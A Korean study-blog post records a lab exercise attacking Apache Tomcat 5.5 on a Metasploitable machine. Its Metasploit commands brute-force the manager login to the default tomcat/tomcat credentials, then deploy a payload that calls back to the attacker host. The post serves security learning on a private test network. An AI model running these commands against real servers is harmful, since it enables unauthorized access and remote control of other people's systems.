일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- CustomScrollView
- ScrollView
- scroll
- binding
- LifeCycle
- textfield
- Dialog
- Navigation
- Compose
- intent
- livedata
- TEST
- viewmodel
- 계측
- appbar
- DART
- data
- tabbar
- Flutter
- 안드로이드
- Kotlin
- 앱
- 앱바
- Button
- Coroutines
- activity
- 테스트
- textview
- drift
- android
- Today
- Total
Study Record
[모의해킹 실습] Tomcat 취약점 본문
1. 개요
Tomcat 버전 5.x 에서기본 페이지를 사용할 경우 생기는 취약점을 알아본다.
- (msfconsole) auxiliary/scanner/http/tomcat_mgr_login
- (msfconsole) use exploit/multi/http/tomcat_mgr_deploy
2. 공격 실습
공격자(KaliLiux) : 192.168.10.50
공격 대상(metasploitable) : 192.168.10.141
[KaliLinux]
① 공격대상 시스템에 스캐닝을 시도하여 취약한 samba 서비스를 사용하고 있는 것을 확인한다.
# nmap -sV -O 192.168.10.141
② Apache Tomcat 를 사용하고 있는 사이트에 접속한다.
# firefox http://192.168.10.141:8180 &
Apache Tomcat/5.5 버전이 설치되어 있고 기본 페이지로 되어있다.
Tomcat Manager 를 누르고 이 창을 유지한다.
③ Tomcat 홈페이지의 관리자 페이지를 가지고 Dictionary Attack 을 수행한다.
# msfconsole -q
msf6> search apache tomcat
msf6> use auxiliary/scanner/http/tomcat_mgr_login
msf6> set STOP_ON_SUCCESS true
msf6> set RHOSTS 192.168.10.141
msf6> set RPORT 8180
msf6> run
실행한 결과 ID 는 “tomcat” 이고 password는 “tomcat” 이라는 사실을 알 수 있다.
④ Tomcat 홈페이지의 관리자 페이지에 tomcat/tomcat으로 로그인한다.
관리자 페이지에 파일을 업로드할 수 있는 상태가 됐다.
⑤ 관리자 페이지에 파일 업로드 공격을 시도한다.
msf6> search apache tomcat
msf6> use exploit/multi/http/tomcat_mgr_deploy
msf6> set HttpPassword tomcat
msf6> set HttpUsername tomcat
msf6> set RHOSTS 192.168.10.141
msf6> set RPORT 8180
msf6> set LHOST 192.168.10.50
msf6> run
'모의해킹' 카테고리의 다른 글
[모의해킹 시스템 취약점] JAVA RMI (CVE-2011-3556) (0) | 2021.11.13 |
---|---|
[모의해킹 실습] Root SSH Key Crack(CVE 2008-0116) (0) | 2021.11.11 |
[모의해킹 시스템 취약점] Samba(CVE 2007-2477, 공유 설정 ) (0) | 2021.11.09 |
[모의해킹 MSF] payload (0) | 2021.11.08 |
[모의해킹 시스템 취약점] NFS 전체 공유/vsftpd 백도어 (0) | 2021.11.08 |